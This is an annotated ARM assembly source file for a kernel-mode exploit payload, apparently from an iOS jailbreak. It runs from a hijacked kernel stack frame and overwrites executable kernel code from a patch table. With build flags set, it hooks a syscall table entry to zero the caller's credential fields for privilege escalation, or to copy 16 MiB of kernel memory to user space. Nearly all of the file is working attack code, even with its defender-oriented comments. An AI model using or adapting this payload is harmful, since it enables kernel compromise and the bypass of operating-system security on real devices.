/*
 * kcode.S — 32-bit ARM (ARM state) payload that runs in kernel mode.
 *
 * The file goes through the C preprocessor. VERSION selects between two
 * sets of hard-coded structure offsets through c(a, b): `a` is used when
 * VERSION is at least 0x040300, `b` otherwise. The constants look like a
 * packed major/minor/patch release number (0x040300 = 4.3.0), but that is
 * an inference — the file never says what VERSION encodes. DEJAVU and DUMP
 * switch on the optional syscall hook defined further down.
 */
#if VERSION >= 0x040300
/* newer layout: first argument of every c(a, b) below */
#define c(a, b) a
#else
/* older layout: second argument of every c(a, b) below */
#define c(a, b) b
#endif
.syntax unified
.arm
/*
 * start — payload entry point, executed in kernel mode.
 *
 * The first two instructions re-derive sp from a word saved at a
 * hard-coded offset in the current frame, so everything that follows (the
 * [sp, #...] load of r6 in the 4.2.6..4.3 build and the two pops at the
 * end) depends on the exact stack layout of the code path that was taken
 * over. None of those offsets can be derived from this file.
 *
 * Register roles:
 *   r4  inherited from the hijacked caller (never written here); in the
 *       default build it is dereferenced to obtain r6
 *   r5  cursor into the `stuff` patch table
 *   r6  structure whose fields are written at `end`; where it comes from
 *       depends on VERSION
 *   r8  entry count loaded from `count`; pf_loop counts it down to 0 and
 *       `end` then stores that 0 twice, so those two str lines rely on
 *       r8 == 0 at loop exit
 *
 * Defender's view: pf_loop writes into memory it then flushes from the
 * data cache and invalidates in the instruction cache — i.e. it patches
 * executable kernel code in place — and the DEJAVU/DUMP builds replace a
 * function pointer in the syscall table. Kernel-text and syscall-table
 * integrity checks are the controls that observe exactly these actions.
 */
start:
@ xxx offset: hard-coded distance into the hijacked frame. sp is then moved
@ down 0x18 so that the two pops at the end line up with the saved registers.
ldr sp, [sp, #(856 + 0x40 - 0xa0)]
sub sp, #0x18
#if 0
@ never assembled: a diagnostic crash (fixed sp, jump to -1)
mov r5, sp; mov sp, #0x80000000; orr sp, #0x2000; mov pc, #-1
#endif
@ r6 = object to fix up at `end`; its location differs per VERSION
#if VERSION >= 0x040206 && VERSION < 0x040300
ldr r6, [sp, #(0x3c - 0x30 - 0x24)]
#else
ldr r6, [r4]                    @ r4 is whatever the hijacked code left in it
#endif
adr r0, inspiring
bl _IOLog                       @ IOLog("I exist!\n") — a marker in the kernel log
#mov r0, #105
#mov r1, #9
#blx _proc_signal
#mov r8, #0; b end
adr r5, stuff                   @ r5 = first patch entry
ldr r8, count                   @ r8 = entry count; must be >= 1, the loop is do-while
@ Each entry is { u32 addr; u32 len; u8 data[len]; } with the next entry
@ packed immediately after data[]. ldm requires r5 to be word-aligned, so
@ len is assumed to be a multiple of 4 — nothing here checks that.
pf_loop:
ldm r5, {r0, r2}                @ r0 = addr, r2 = len
add r1, r5, #8                  @ r1 = &data[0]
bl _memmove                     @ memmove(addr, data, len): overwrite the target
ldm r5, {r0, r1}                @ r0 = addr, r1 = len
mov r2, #0
bl _flush_dcache                @ flush_dcache(addr, len, 0)
ldm r5!, {r0, r1}               @ reload addr/len, r5 += 8
add r5, r1                      @ r5 += len: advance to the next entry
mov r2, #0
bl _invalidate_icache           @ invalidate_icache(addr, len, 0): the target is code
subs r8, #1
bne pf_loop
end:
@ r8 == 0 here (loop exit). Allocate a lock and clear two fields of r6.
bl _IOLockAlloc
str r0, [r6, #c(0x2d8, 0x23c)]  @ store the new IOLock
str r8, [r6, #c(0x238, 0x19c)]  @ = 0
str r8, [r6, #c(0x2d4, 0x238)]  @ = 0
@ fix up linked lists: make the list heads inside r6 point at themselves
@ (empty queues). Which lists these are is not derivable from this file.
#if 0 && (VERSION < 0x040300)
add r0, r6, #0x170
str r0, [r6, #0x170]
str r0, [r6, #0x174]
add r0, r6, #0x178
str r0, [r6, #0x178]
str r0, [r6, #0x17c]
#endif
add r0, r6, #c(0x218, 0x180)
str r0, [r6, #c(0x21c, 0x184)]  @ field +0x21c/+0x184 = address of field +0x218/+0x180
add r0, r6, #c(0x220, 0x188)
str r0, [r6, #c(0x220, 0x188)]  @ next = self
str r0, [r6, #c(0x224, 0x18c)]  @ prev = self
#if defined(DEJAVU) || defined(DUMP)
@ Install syscall_0 (defined below) as the function pointer at sysent+4.
@ `sysent` is a word in the data block that must already be filled in.
ldr r0, sysent
adr r1, syscall_0
str r1, [r0, #0x4]
#endif
#ifdef DUMP
@ Snapshot 16 MiB starting at 0x80000000 into a freshly allocated buffer;
@ syscall_0 later copies it out to user space.
mov r0, #(16*1024*1024)
bl _IOMalloc
str r0, dumpbuf                 @ PC-relative store into this blob: it must be mapped writable
mov r1, #0x80000000
mov r2, #(16*1024*1024)
bl _memcpy                      @ memcpy(buf, 0x80000000, 16 MiB); buf is not checked for NULL
#endif
@ Return into the hijacked frame: these pops mirror the original epilogue
@ of the code path that was taken over (assumed, not visible here).
pop {r8, r10, r11}
pop {r4-r7, pc}
#if defined(DEJAVU) || defined(DUMP)
/*
 * syscall_0 — one-shot handler that `start` installs at sysent+4.
 *
 * On entry r0 is whatever the syscall dispatcher passed as its first
 * argument; it is handed straight to _proc_ucred, so it is presumably the
 * calling proc (not verifiable from this file).
 *
 * DUMP build: copies the 16 MiB snapshot taken by `start` to the fixed
 * user address 0x10000000 with _copyout(src, dst, len).
 * Other builds: stores 0 into the ucred fields at +0xc and +0x10 and, when
 * the pointer at +c(0x6c, 0x80) is non-NULL, into +8 of that object. The
 * field names are not derivable here, but a credential structure being
 * rewritten from inside a syscall handler is the event a kernel-integrity
 * monitor should flag.
 *
 * Both paths then copy the word at sysent+0xc4 back into sysent+4, which
 * removes the hook after its first invocation (the value at +0xc4 is
 * presumably the handler the hook replaced or a neighbouring entry). r0
 * holds the sysent pointer on return, not a meaningful syscall result.
 */
syscall_0:
push {lr}
#ifdef DUMP
ldr r0, dumpbuf                 @ r0 = kernel buffer filled by start
mov r1, #0x10000000             @ r1 = user-space destination (fixed address)
mov r2, #(16*1024*1024)
bl _copyout                     @ copyout(r0, r1, 16 MiB); result is ignored
#else
bl _proc_ucred                  @ r0 = ucred of the proc passed in r0
mov r1, #0
str r1, [r0, #0xc]              @ zero field +0xc
str r1, [r0, #0x10]             @ zero field +0x10
ldr r0, [r0, #c(0x6c, 0x80)]    @ r0 = pointer stored at +0x6c/+0x80
cmp r0, #0
strne r1, [r0, #8]              @ if non-NULL, zero its field +8
#endif
@ Uninstall: sysent+4 = word at sysent+0xc4, so the hook fires only once
ldr r0, sysent
ldr r1, [r0, #0xc4]
str r1, [r0, #0x4]
pop {pc}
#endif
/*
 * Data. All of it lives inside the code blob: `sysent` and `count` are
 * zero placeholders that must be filled in before `start` runs (presumably
 * by whatever installs the blob — not shown here), and `dumpbuf` is
 * written at run time by `start`, so the blob has to be mapped writable as
 * well as executable.
 */
inspiring: .asciz "I exist!\n"
.align 2                        @ 4-byte alignment (ARM .align is a power of two) for the words below
#ifdef DUMP
dumpbuf: .long 0                @ kernel buffer holding the 16 MiB snapshot
#endif
sysent: .long 0                 @ table base used at +0x4 and +0xc4; filled in externally
count: .long 0                  @ number of entries in stuff; pf_loop needs >= 1
@ Patch table consumed by pf_loop: each entry is a u32 target address, a
@ u32 length, then that many bytes; entries are packed back to back and
@ each length should be a multiple of 4 so ldm stays word-aligned.
@ The entries themselves follow this label and are not part of this view.
stuff: